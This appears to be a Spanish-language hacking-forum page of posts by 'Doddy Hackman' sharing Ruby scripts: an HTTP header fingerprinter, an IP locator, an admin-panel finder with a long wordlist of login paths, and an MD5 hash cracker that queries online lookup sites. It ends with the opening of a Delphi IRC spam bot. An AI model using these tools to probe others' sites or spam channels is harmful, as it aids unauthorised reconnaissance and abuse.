  53.  

Version Tk :

Código
  1. #!usr/bin/ruby
  2. #HTTP FingerPrinting 0.2
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "tk"
  6. require "net/http"
  7.  
  8. # Functions
  9.  
  10. def httpfinger(page)
  11. respuesta = ""
  12. begin
  13. nave = Net::HTTP.start(page)
  14. headers = nave.head("/")
  15. headers.each do |name,value|
  16. respuesta = respuesta + "[+] "+name+" : "+value+"\n"
  17. end
  18. nave.finish
  19. rescue
  20. respuesta = "Error"
  21. end
  22. return respuesta
  23. end
  24.  
  25. #
  26.  
  27. window = TkRoot.new { title "HTTP FingerPrinting 0.2 Coded By Doddy H" ; background "black" }
  28. window['geometry'] = '300x300-20+10'
  29.  
  30. TkLabel.new(window) do
  31. background "black"
  32. foreground "cyan"
  33. text "    Target : "
  34. place('relx'=>"0.1",'rely'=>"0.1")
  35. end
  36.  
  37. target = TkEntry.new(window){
  38. background "black"
  39. foreground "cyan"
  40. width 25
  41. place('relx'=>0.3,'rely'=>0.1)
  42. }
  43.  
  44. TkLabel.new(window) do
  45. background "black"
  46. foreground "cyan"
  47. text "Console"
  48. place('relx'=>0.4,'rely'=>0.2)
  49. end
  50.  
  51. console =TkText.new(window) do
  52. background "black"
  53. foreground "cyan"
  54. width 30
  55. height 10
  56. place('relx'=>0.1,'rely'=>0.3)
  57. end
  58.  
  59. TkButton.new(window) do
  60. text "Search"
  61.        background "black"
  62. foreground "cyan"
  63. width 17
  64. activebackground "cyan"
  65. highlightbackground  "cyan"
  66. command proc{
  67. target = target.value.to_s
  68. console.insert("end","[+] Searching ...\n\n")
  69. console.insert("end",httpfinger(target))
  70. console.insert("end","\n[+] Finished")
  71. }
  72. place('relx'=>0.3,'rely'=>0.9)
  73. end
  74.  
  75. Tk.mainloop
  76.  
  77. #The End ?
  78.  

Una imagen :



Eso es todo.
3  Programación / Scripting / [Ruby] LocateIP 0.3 en: 27 Junio 2015, 01:18
Un simple script en Ruby para localizar una IP y sus DNS.

Version consola :

Código
  1. #!usr/bin/ruby
  2. #LocateIP 0.3
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "open-uri"
  6. require "net/http"  
  7. require "resolv"
  8.  
  9. # Functions
  10.  
  11. def get_ip(hostname)
  12. begin
  13. return Resolv.getaddress(hostname)
  14. rescue
  15. return "Error"
  16. end
  17. end
  18.  
  19. def toma(web)
  20. begin
  21. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  22. rescue
  23. return "Error"
  24. end
  25. end
  26.  
  27. def response_code(web)
  28. begin
  29. return Net::HTTP.get_response(URI(web)) .code
  30. rescue
  31. return "404"
  32. end
  33. end
  34.  
  35. def tomar(web,arg)
  36. begin
  37. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  38. uri = URI(web)
  39. http = Net::HTTP.new(uri.host, uri.port)
  40. return http.post(uri.path,arg, headers).body
  41. rescue
  42. return "Error"
  43. end
  44. end
  45.  
  46. def uso
  47. print "\n[+] Sintax : ruby locateip.rb <target>\n"
  48. end
  49.  
  50. def  head
  51. print "\n\n-- == LocateIP 0.3 == --\n\n"
  52. end
  53.  
  54. def copyright
  55. print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  56. end
  57.  
  58. def locateip(target)
  59.  
  60. print "\n[+] Getting IP ...\n"
  61.  
  62. ip = get_ip(target)
  63.  
  64. print "\n[+] IP : "+ip+"\n"
  65.  
  66. web = "http://www.melissadata.com/lookups/iplocation.asp"
  67. print "\n[+] Locating ...\n\n"
  68.  
  69. code = tomar(web,"ipaddress="+ip+"&btn=Submit")
  70.  
  71. if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
  72. print "[+] City : "+$2+"\n"
  73. else
  74. print "[+] City : Not Found\n"
  75. end
  76.  
  77. if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
  78. print "[+] Country : "+$2+"\n"
  79. else
  80. print "[+] Country : Not Found\n"
  81. end
  82.  
  83. if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
  84. print "[+] State or Region : "+$2+"\n";
  85. else
  86. print "[+] State of Region : Not Found\n"
  87. end
  88.  
  89. print "\n[+] Getting DNS ...\n\n"
  90.  
  91. control = "0"
  92.  
  93. code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
  94.  
  95. dnss = code.scan(/whois\/(.*?)\">Whois/)
  96.  
  97. dnss.flatten.each do |dns|
  98. begin
  99. if dns != ""
  100. control = "1"
  101. print "[+] DNS Found : "+dns
  102. end
  103. end
  104. end
  105.  
  106. if control=="0"
  107. print "\n[-] DNS Not Found\n"
  108. end
  109. end
  110.  
  111. target = ARGV[0]
  112.  
  113. head()
  114.  
  115. if !target
  116. uso()
  117. else
  118. locateip(target)
  119. end
  120.  
  121. copyright()
  122.  
  123. #The End ?
  124.  

Version Tk :

Código
  1. #!usr/bin/ruby
  2. #LocateIP 0.3
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "tk"
  6. require "open-uri"
  7. require "net/http"
  8. require "resolv"
  9.  
  10. # Functions
  11.  
  12. def get_ip(hostname)
  13. begin
  14. return Resolv.getaddress(hostname)
  15. rescue
  16. return "Error"
  17. end
  18. end
  19.  
  20. def toma(web)
  21. begin
  22. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  23. rescue
  24. return "Error"
  25. end
  26. end
  27.  
  28. def response_code(web)
  29. begin
  30. return Net::HTTP.get_response(URI(web)) .code
  31. rescue
  32. return "404"
  33. end
  34. end
  35.  
  36. def tomar(web,arg)
  37. begin
  38. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  39. uri = URI(web)
  40. http = Net::HTTP.new(uri.host, uri.port)
  41. return http.post(uri.path,arg, headers).body
  42. rescue
  43. return "Error"
  44. end
  45. end
  46.  
  47. #
  48.  
  49. window = TkRoot.new { title "LocateIP 0.3 (C) Doddy Hackman 2015" ; background "black" }
  50. window['geometry'] = '300x300-20+10'
  51.  
  52. TkLabel.new(window) do
  53. background "black"
  54. foreground "yellow"
  55. text "    Target : "
  56. place('relx'=>"0.1",'rely'=>"0.1")
  57. end
  58.  
  59. target = TkEntry.new(window){
  60. background "black"
  61. foreground "yellow"
  62. width 25
  63. place('relx'=>0.3,'rely'=>0.1)
  64. }
  65.  
  66. TkLabel.new(window) do
  67. background "black"
  68. foreground "yellow"
  69. text "Console"
  70. place('relx'=>0.4,'rely'=>0.2)
  71. end
  72.  
  73. console =TkText.new(window) do
  74. background "black"
  75. foreground "yellow"
  76. width 30
  77. height 10
  78. place('relx'=>0.1,'rely'=>0.3)
  79. end
  80.  
  81. TkButton.new(window) do
  82. text "Search"
  83.        background "black"
  84. foreground "yellow"
  85. width 17
  86. activebackground "yellow"
  87. highlightbackground  "yellow"
  88. command proc{
  89.  
  90. target = target.value.to_s
  91.  
  92. console.insert("end",  "[+] Getting IP ...\n")
  93.  
  94. ip = get_ip(target)
  95.  
  96. web = "http://www.melissadata.com/lookups/iplocation.asp"
  97.  
  98. console.insert("end", "\n[+] Locating ...\n\n")
  99.  
  100. code = tomar(web,"ipaddress="+ip+"&btn=Submit")
  101.  
  102. if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
  103. console.insert("end", "[+] City : "+$2+"\n")
  104. else
  105. console.insert("end", "[+] City : Not Found\n")
  106. end
  107.  
  108. if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
  109. console.insert("end","[+] Country : "+$2+"\n")
  110. else
  111. console.insert("end", "[+] Country : Not Found\n")
  112. end
  113.  
  114. if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
  115. console.insert("end", "[+] State or Region : "+$2+"\n")
  116. else
  117. console.insert("end","[+] State of Region : Not Found\n")
  118. end
  119.  
  120. console.insert("end","\n[+] Getting DNS ...\n\n")
  121.  
  122. control = "0"
  123.  
  124. code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
  125.  
  126. dnss = code.scan(/whois\/(.*?)\">Whois/)
  127.  
  128. dnss.flatten.each do |dns|
  129. begin
  130. if dns != ""
  131. control = "1"
  132. console.insert("end", "[+] DNS Found : "+dns)
  133. end
  134. end
  135. end
  136.  
  137. if control=="0"
  138. console.insert("end","\n[-] DNS Not Found\n")
  139. end
  140.  
  141. console.insert("end","\n\n[+] Finished")
  142.  
  143. }
  144. place('relx'=>0.3,'rely'=>0.9)
  145. end
  146.  
  147. Tk.mainloop
  148.  
  149. #The End ?
  150.  

Una imagen :



Eso es todo.
4  Programación / Scripting / [Ruby] PanelFinder 0.5 en: 12 Junio 2015, 23:52
Un simple script en Ruby para buscar el panel de administracion de una pagina.

Version consola :

Código
  1. #!usr/bin/ruby
  2. #PanelFinder 0.5
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "open-uri"
  6. require "net/http"  
  7.  
  8. # Functions
  9.  
  10. def toma(web)
  11. begin
  12. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  13. rescue
  14. return "Error"
  15. end
  16. end
  17.  
  18. def response_code(web)
  19. begin
  20. return Net::HTTP.get_response(URI(web)) .code
  21. rescue
  22. return "404"
  23. end
  24. end
  25.  
  26. def tomar(web,arg)
  27. begin
  28. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  29. uri = URI(web)
  30. http = Net::HTTP.new(uri.host, uri.port)
  31. return http.post(uri.path,arg, headers).body
  32. rescue
  33. return "Error"
  34. end
  35. end
  36.  
  37. def find_panel(page)
  38. panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
  39. print "\n[+] Scanning ...\n\n"
  40. control = "0"
  41. panels.each do |panel|
  42. begin
  43. url = page+"/"+panel
  44. status_code = response_code(url)
  45. if status_code=="200"
  46. print "[+] Link : "+url+"\n"
  47. control = "1"
  48. end
  49. end
  50. end
  51. if control=="1"
  52. print "\n[+] Finished\n"
  53. else
  54. print "\n[-] Not Found\n"
  55. end
  56. end
  57.  
  58. def uso
  59. print "\n[+] Sintax : ruby panel_finder.rb <page>\n"
  60. end
  61.  
  62. def  head
  63. print "\n\n-- ==  Panel Finder 0.5 == --\n\n"
  64. end
  65.  
  66. def copyright
  67. print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  68. end
  69.  
  70. page = ARGV[0]
  71.  
  72. head()
  73.  
  74. if !page
  75. uso()
  76. else
  77. find_panel(page)
  78. end
  79.  
  80. copyright()
  81.  
  82. #The End ?
  83.  

Version Tk :

Código
  1. #!usr/bin/ruby
  2. #PanelFinder 0.5
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "tk"
  6. require "open-uri"
  7. require "net/http"
  8.  
  9. # Functions
  10.  
  11. def toma(web)
  12. begin
  13. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  14. rescue
  15. return "Error"
  16. end
  17. end
  18.  
  19. def response_code(web)
  20. begin
  21. return Net::HTTP.get_response(URI(web)) .code
  22. rescue
  23. return "404"
  24. end
  25. end
  26.  
  27. def tomar(web,arg)
  28. begin
  29. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  30. uri = URI(web)
  31. http = Net::HTTP.new(uri.host, uri.port)
  32. return http.post(uri.path,arg, headers).body
  33. rescue
  34. return "Error"
  35. end
  36. end
  37.  
  38. #
  39.  
  40. window = TkRoot.new { title "PanelFinder 0.5 (C) Doddy Hackman 2015" ; background "black" }
  41. window['geometry'] = '300x300-20+10'
  42.  
  43. TkLabel.new(window) do
  44. background "black"
  45. foreground "orange"
  46. text "     Page : "
  47. place('relx'=>"0.1",'rely'=>"0.1")
  48. end
  49.  
  50. page = TkEntry.new(window){
  51. background "black"
  52. foreground "orange"
  53. width 25
  54. place('relx'=>0.3,'rely'=>0.1)
  55. }
  56.  
  57. TkLabel.new(window) do
  58. background "black"
  59. foreground "orange"
  60. text "Console"
  61. place('relx'=>0.4,'rely'=>0.2)
  62. end
  63.  
  64. console =TkText.new(window) do
  65. background "black"
  66. foreground "orange"
  67. width 30
  68. height 10
  69. place('relx'=>0.1,'rely'=>0.3)
  70. end
  71.  
  72. TkButton.new(window) do
  73. text "Search"
  74.    background "black"
  75. foreground "orange"
  76. width 17
  77. activebackground "orange"
  78. highlightbackground  "orange"
  79. command proc{
  80.  
  81. page = page.value.to_s
  82. panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
  83. console.insert("end", "[+] Scanning ...\n\n")
  84. control = "0"
  85. panels.each do |panel|
  86. begin
  87. url = page+"/"+panel
  88. status_code = response_code(url)
  89. if status_code=="200"
  90. console.insert("end","[+] Link : "+url+"\n")
  91. control = "1"
  92. end
  93. end
  94. end
  95. if control=="1"
  96. console.insert("end","\n[+] Finished")
  97. else
  98. console.insert("end","\n[-] Not Found")
  99. end
  100.  
  101. }
  102. place('relx'=>0.3,'rely'=>0.9)
  103. end
  104.  
  105. Tk.mainloop
  106.  
  107. #The End ?
  108.  

Una imagen :



Eso es todo.
5  Programación / Scripting / [Ruby] MD5 Cracker 0.2 en: 29 Mayo 2015, 16:37
Un simple script en Ruby para crackear un hash MD5.

Version consola :

Código
  1. #!usr/bin/ruby
  2. #MD5 Cracker 0.2
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "open-uri"
  6. require "net/http"  
  7.  
  8. # Functions
  9.  
  10. def toma(web)
  11. begin
  12. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  13. rescue
  14. return "Error"
  15. end
  16. end
  17.  
  18. def response_code(web)
  19. begin
  20. return Net::HTTP.get_response(URI(web)) .code
  21. rescue
  22. return "404"
  23. end
  24. end
  25.  
  26. def tomar(web,arg)
  27. begin
  28. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  29. uri = URI(web)
  30. http = Net::HTTP.new(uri.host, uri.port)
  31. return http.post(uri.path,arg, headers).body
  32. rescue
  33. return "Error"
  34. end
  35. end
  36.  
  37. def crack(md5)
  38.  
  39. print "\n[+] Cracking ...\n\n"
  40.  
  41. code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
  42.  
  43. if code=~/pass : <b>(.*?)<\/b>/
  44. password = $1
  45. print "[+] md5online.net -> "+password+"\n"
  46. else
  47. print "[-] md5online.net -> Not Found" + "\n"
  48. end
  49.  
  50. code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
  51.  
  52. if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
  53. password = $1
  54. print "[+] md5.my-addr.co -> "+password+"\n"
  55. else
  56. print "[-] md5.my-addr.co -> Not Found" +"\n"
  57. end
  58.  
  59. code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
  60.  
  61. if code=~/Decrypted Text: <\/b>(.*?)<\/font>/
  62. password = $1
  63. print "[+] md5decryption.com -> "+password+"\n"
  64. else
  65. print "[-] md5decryption.com -> Not Found"+"\n"
  66. end
  67.  
  68. print "\n[+] Finished"
  69.  
  70. end
  71.  
  72. def uso
  73. print "\n[+] Sintax : ruby md5cracker.rb <md5>\n"
  74. end
  75.  
  76. def  head
  77. print "\n\n-- == MD5 Cracker 0.2 == --\n\n"
  78. end
  79.  
  80. def copyright
  81. print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  82. end
  83.  
  84. #
  85.  
  86. md5 = ARGV[0]
  87.  
  88. head()
  89.  
  90. if !md5
  91. uso()
  92. else
  93. crack(md5)
  94. end
  95.  
  96. copyright()
  97.  
  98. #The End ?
  99.  

Version Tk :

Código
  1. #!usr/bin/ruby
  2. #MD5 Cracker 0.2
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "tk"
  6. require "open-uri"
  7. require "net/http"
  8.  
  9. #Functions
  10.  
  11. # Functions
  12.  
  13. def toma(web)
  14. begin
  15. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  16. rescue
  17. return "Error"
  18. end
  19. end
  20.  
  21. def response_code(web)
  22. begin
  23. return Net::HTTP.get_response(URI(web)) .code
  24. rescue
  25. return "404"
  26. end
  27. end
  28.  
  29. def tomar(web,arg)
  30. begin
  31. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  32. uri = URI(web)
  33. http = Net::HTTP.new(uri.host, uri.port)
  34. return http.post(uri.path,arg, headers).body
  35. rescue
  36. return "Error"
  37. end
  38. end
  39.  
  40. #
  41.  
  42. window = TkRoot.new { title "MD5 Cracker 0.2 (C) Doddy Hackman 2015" ; background "black" }
  43. window['geometry'] = '300x300-20+10'
  44.  
  45. TkLabel.new(window) do
  46. background "black"
  47. foreground "green"
  48. text "     MD5 : "
  49. place('relx'=>"0.1",'rely'=>"0.1")
  50. end
  51.  
  52. md5 = TkEntry.new(window){
  53. background "black"
  54. foreground "green"
  55. width 25
  56. place('relx'=>0.3,'rely'=>0.1)
  57. }
  58.  
  59. TkLabel.new(window) do
  60. background "black"
  61. foreground "green"
  62. text "Console"
  63. place('relx'=>0.4,'rely'=>0.2)
  64. end
  65.  
  66. console =TkText.new(window) do
  67. background "black"
  68. foreground "green"
  69. width 30
  70. height 10
  71. place('relx'=>0.1,'rely'=>0.3)
  72. end
  73.  
  74. TkButton.new(window) do
  75. text "Crack It"
  76.        background "black"
  77. foreground "green"
  78. width 17
  79. activebackground "green"
  80. highlightbackground  "green"
  81. command proc{
  82. md5 = md5.value.to_s
  83.  
  84. console.insert("end","[+] Cracking ...\n\n")
  85.  
  86. code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
  87. if code=~/pass : <b>(.*?)<\/b>/
  88. password = $1
  89. console.insert("end","[+] md5online.net -> "+password+"\n"  )
  90. else
  91. console.insert("end","[-] md5online.net -> Not Found" + "\n" )
  92. end
  93.  
  94. code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
  95.  
  96. if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
  97. password = $1
  98. console.insert("end","[+] md5.my-addr.co -> "+password+"\n")
  99. else
  100. console.insert("end","[-] md5.my-addr.co -> Not Found" +"\n")
  101. end
  102.  
  103. code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
  104.  
  105. if code=~/Decrypted Text: <\/b>(.*?)<\/font>/
  106. password = $1
  107. console.insert("end","[+] md5decryption.com -> "+password+"\n")
  108. else
  109. console.insert("end","[-] md5decryption.com -> Not Found"+"\n")
  110.        end
  111.  
  112. console.insert("end","\n[+] Finished\n" )
  113.  
  114. }
  115. place('relx'=>0.3,'rely'=>0.9)
  116. end
  117.  
  118. Tk.mainloop
  119.  
  120. #The End ?
  121.  

Una imagen :



Eso es todo.
6  Programación / Programación General / [Delphi] KingSpam 0.4 en: 22 Mayo 2015, 17:23
Un simple programa para hacer spam en canales IRC , tambien puede listar canales y usuarios.

Es algo inestable les recomiendo la version en Perl.

Una imagen :



Código
  1. // KingSpam 0.4
  2. // (C) Doddy Hackman 2015
  3.  
  4. unit spam;
  5.  
  6. interface
  7.  
  8. uses
  9.  Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
  10.  System.Classes, Vcl.Graphics,
  11.  Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ComCtrls, Vcl.StdCtrls,
  12.  Vcl.Imaging.pngimage, Vcl.ExtCtrls, IdContext, IdBaseComponent, IdComponent,
  13.  IdTCPConnection, IdTCPClient, IdCmdTCPClient, IdIRC, PerlRegEx, Vcl.Menus,
  14.  ShellApi;
  15.  
  16. type
  17.  TForm1 = class(TForm)
  18.    PageControl1: TPageControl;
  19.    TabSheet1: TTabSheet;
  20.    GroupBox1: TGroupBox;
  21.    Label1: TLabel;
  22.    host: TEdit;
  23.    Label2: TLabel;
  24.    port: TEdit;
  25.    Label3: TLabel;
  26.    nombre: TEdit;
  27.    Label4: TLabel;
  28.    canal: TEdit;
  29.    Label5: TLabel;
  30.    spam: TEdit;
  31.    Button1: TButton;
  32.    Button2: TButton;
  33.    Button3: TButton;
  34.    TabSheet2: TTabSheet;
  35.    GroupBox2: TGroupBox;
  36.    GroupBox3: TGroupBox;
  37.    canales: TListBox;
  38.    users: TListBox;
  39.    TabSheet3: TTabSheet;
  40.    GroupBox4: TGroupBox;
  41.    GroupBox5: TGroupBox;
  42.    lista_canales: TListBox;
  43.    console1: TMemo;
  44.    Label6: TLabel;
  45.    canal_agregar: TEdit;
  46.    Button4: TButton;
  47.    Button5: TButton;
  48.    TabSheet5: TTabSheet;
  49.    GroupBox8: TGroupBox;
  50.    console2: TMemo;
  51.    IdIRC1: TIdIRC;
  52.    Button9: TButton;
  53.    StatusBar1: TStatusBar;
  54.    GroupBox6: TGroupBox;
  55.    canal_spam_usuarios: TEdit;
  56.    TabSheet4: TTabSheet;
  57.    GroupBox7: TGroupBox;
  58.    Image2: TImage;
  59.    Label7: TLabel;
  60.    PopupMenu1: TPopupMenu;
  61.    L1: TMenuItem;
  62.    R1: TMenuItem;
  63.    OpenDialog1: TOpenDialog;
  64.    file_spam: TListBox;
  65.    spam_usuarios: TTimer;
  66.    Button11: TButton;
  67.    Button6: TButton;
  68.    otrospamfile: TListBox;
  69.    Image3: TImage;
  70.    procedure Button2Click(Sender: TObject);
  71.    procedure IdIRC1Raw(ASender: TIdContext; AIn: Boolean;
  72.      const AMessage: string);
  73.  
  74.    procedure Button3Click(Sender: TObject);
  75.    procedure Button4Click(Sender: TObject);
  76.    procedure Button5Click(Sender: TObject);
  77.  
  78.    procedure Button1Click(Sender: TObject);
  79.    procedure L1Click(Sender: TObject);
  80.    procedure R1Click(Sender: TObject);
